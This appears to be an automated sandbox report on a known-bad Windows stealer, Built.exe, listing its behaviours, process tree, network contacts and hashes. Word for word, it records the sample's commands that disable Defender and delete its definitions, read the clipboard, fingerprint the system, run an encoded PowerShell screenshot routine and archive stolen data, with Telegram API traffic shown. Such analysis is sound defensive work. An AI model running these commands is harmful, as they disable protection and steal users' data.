Analysis Overview
SHA256
8f41839c2a8a80984e95a7d8dd037f777aeebc72fc134ce4eb487b909f501603
Threat Level: Known bad
The file Built.exe was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Command and Scripting Interpreter: PowerShell
Clipboard Data
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
UPX packed file
Enumerates processes with tasklist
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Gathers system information
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Detects videocard installed
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-12 14:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-12 14:33
Reported
2024-11-12 14:33
Platform
win10ltsc2021-20241023-en
Max time kernel
32s
Max time network
36s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r4n4ah4w\r4n4ah4w.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A5B.tmp" "c:\Users\Admin\AppData\Local\Temp\r4n4ah4w\CSC60B37459BC424B6A9FFB77B615D4B59.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\HZMGF.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\HZMGF.zip" *
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 172.165.69.228:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| FR | 20.199.58.43:443 | fd.api.iris.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI46562\python311.dll
| MD5 | bb46b85029b543b70276ad8e4c238799 |
| SHA1 | 123bdcd9eebcac1ec0fd2764a37e5e5476bb0c1c |
| SHA256 | 72c24e1db1ba4df791720a93ca9502d77c3738eebf8b9092a5d82aa8d80121d0 |
